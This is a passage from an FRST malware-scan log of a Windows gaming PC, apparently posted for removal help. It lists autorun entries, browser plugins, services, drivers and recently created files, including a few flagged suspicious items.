HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {7675d3a1-2dd6-11e3-becb-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81542b50-c6b0-11e3-bee8-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81b30cb5-ce51-11e3-beea-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {88bc3d74-e828-11e2-beb3-3085a9a720f7} - "V:\setup.exe" /autorun
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c3f59-14a9-11e4-befb-3085a9a720f7} - "W:\gods2.0.0.1.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c4780-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48b7-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48ea-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b608f49-403c-11e4-bf02-3085a9a720f7} - "W:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8eecf028-4496-11e3-becd-3085a9a720f7} - "W:\Installer.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc21-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc51-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc60-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cce6-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf09-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf54-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf67-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf84-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cfbe-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {983b7abb-fe41-11e2-bebd-20aa4b7ab8bf} - "V:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cb6a-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cc47-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d536-dbb5-11e3-beec-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d7dc-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357db0c-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357e30d-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b970e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b985e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98a3-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98ae-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {cfd62f9e-d92d-11e3-beec-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c40e4-f792-11e3-bef3-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c41c9-f792-11e3-bef3-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {e71be4cb-cac0-11e3-bee9-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {ea73b1b6-0701-11e2-be6b-806e6f6e6963} - "E:\install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
AppInit_DLLs-x32: DllInjectHelper.dll => "DllInjectHelper.dll" File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnk
ShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKCU - DefaultScope {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
SearchScopes: HKCU - {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
 
FireFox:
========
FF ProfilePath: C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.3.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @idsoftware.com/QuakeLive -> C:\ProgramData\id Software\QuakeLive\npquakezero.dll (id Software Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> C:\Program Files (x86)\Heroes & Generals\live\npretoxlive.dll No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.12 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @TrendMicro.com/FFExtension -> C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension\components\npToolbarChrome.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin HKCU: @coreonline.com/run3d,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll (Square Enix)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\\NPRobloxProxy.dll ( Roblox Corporation)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKCU: ubisoft.com/uplaypc -> C:\Games\Trials\datapack\orbit\npuplaypc.dll No File
FF Extension: MtStream Class - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\{CF0219E1-AA46-BD3E-528B-4CC8133100D7} [2014-10-22]
FF Extension: YouTube Center - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\jid1-cwbvBTE216jjpg@jetpack.xpi [2013-12-23]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-07-15]
FF HKLM-x32\...\Firefox\Extensions: [{7C9C2591-51ED-44FA-8D03-450B92643F95}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-08-01]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
CHR Profile: C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-03-20]
CHR Extension: (Google Drive) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-03-20]
CHR Extension: (Google Search) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-03-20]
CHR Extension: (YouTube Center) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahndmkihaedfgkhbpopcpnbdeckeibo [2014-03-20]
CHR Extension: (Google Wallet) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-20]
CHR Extension: (Gmail) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-03-20]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [920736 2012-06-01] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [951936 2012-06-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [149120 2012-02-17] (ASUSTeK Computer Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-02-03] () [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2014-02-28] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-08-08] (LogMeIn, Inc.)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-06-30] ()
S2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [336824 2010-11-30] (arvato digital services llc)
S2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-07-24] ()
S2 RealPlayer Cloud Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1141848 2014-08-01] (RealNetworks, Inc.)
S2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [23552 2014-07-24] () [File not signed]
S2 RzKLService; C:\Program Files (x86)\Razer\Razer Game Booster\RzKLService.exe [106472 2013-09-18] (Razer Inc.)
S2 RzMaelstromVADStreamingService; C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe [4250624 2014-06-09] (A-Volute) [File not signed]
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
R2 TabletServiceWacom; C:\Windows\system32\Wacom_Tablet.exe [3647272 2009-03-26] (Wacom Technology, Corp.)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635160 2014-04-21] (Wacom Technology, Corp.)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AiCharger; C:\Windows\SysWow64\drivers\AiCharger.sys [14848 2012-03-22] (ASUSTek Computer Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98744 2013-04-23] (Advanced Micro Devices)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [312480 2014-04-24] ()
R3 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283200 2013-05-26] (DT Soft Ltd)
S1 fsthvckq; C:\Windows\system32\drivers\fsthvckq.sys [55104 2014-10-19] (Microsoft Corporation)
R3 hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [46136 2014-09-04] (LogMeIn Inc.)
R3 LcUvcUpper; C:\Windows\system32\DRIVERS\LcUvcUpper.sys [34408 2013-10-14] (Microsoft Corporation)
R3 Linksys_adapter_H; C:\Windows\system32\DRIVERS\AE2500w764.sys [1254464 2011-03-28] (Broadcom Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2014-04-24] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13368 2013-01-23] ()
R3 RZMAELSTROMVADService; C:\Windows\system32\drivers\RzMaelstromVAD.sys [32768 2014-06-09] (Windows ® Win 7 DDK provider)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2014-07-15] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [129856 2014-07-03] (Razer, Inc.)
U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys [37624 2014-10-23] ()
S3 xusb22; C:\Windows\System32\drivers\xusb22.sys [89088 2012-07-25] (Microsoft Corporation)
S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S1 ririguvw; \??\C:\Windows\system32\drivers\ririguvw.sys [X]
S3 wacommousefilter; \SystemRoot\System32\drivers\wacommousefilter.sys [X]
S3 wacomvhid; \SystemRoot\System32\drivers\wacomvhid.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-23 17:06 - 2014-10-23 17:06 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 17:06 - 2014-10-23 17:06 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 17:04 - 2014-10-23 17:06 - 19114072 _____ () C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
2014-10-22 19:46 - 2014-10-23 18:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 3510430382.job
2014-10-22 19:46 - 2014-10-23 18:00 - 00000836 _____ () C:\Windows\Tasks\Security Center Update - 1195299623.job
2014-10-22 19:46 - 2014-10-22 19:46 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 3510430382
2014-10-22 19:46 - 2014-10-22 19:46 - 00003812 _____ () C:\Windows\System32\Tasks\Security Center Update - 1195299623
2014-10-22 19:46 - 2014-10-22 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Myrycaop
2014-10-22 19:46 - 2014-10-22 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Liigli
2014-10-22 19:41 - 2014-10-22 19:42 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Ecvtion
2014-10-22 19:40 - 2014-10-22 19:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Alldworks
2014-10-22 17:50 - 2014-10-22 17:50 - 00001105 _____ () C:\Users\Public\Desktop\RPG MAKER VX Ace.lnk
2014-10-22 17:49 - 2014-10-22 17:49 - 00000000 ____D () C:\Program Files (x86)\Enterbrain
2014-10-22 17:16 - 2014-10-22 17:19 - 00057166 _____ () C:\Users\RaRWolf\Downloads\Addition.txt
2014-10-22 17:11 - 2014-10-23 18:31 - 00038019 _____ () C:\Users\RaRWolf\Downloads\FRST.txt
2014-10-22 17:11 - 2014-10-22 17:11 - 00000000 ____D () C:\Users\RaRWolf\Downloads\FRST-OlderVersion
2014-10-21 18:40 - 2014-10-21 18:40 - 00032720 _____ () C:\Users\RaRWolf\Desktop\attach.txt
2014-10-21 18:40 - 2014-10-21 18:39 - 00021892 _____ () C:\Users\RaRWolf\Desktop\dds.txt
2014-10-21 18:35 - 2014-10-21 18:35 - 00688992 ____R (Swearware) C:\Users\RaRWolf\Downloads\dds.com
2014-10-21 18:29 - 2014-10-21 18:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Running With Rifles 0.98.4
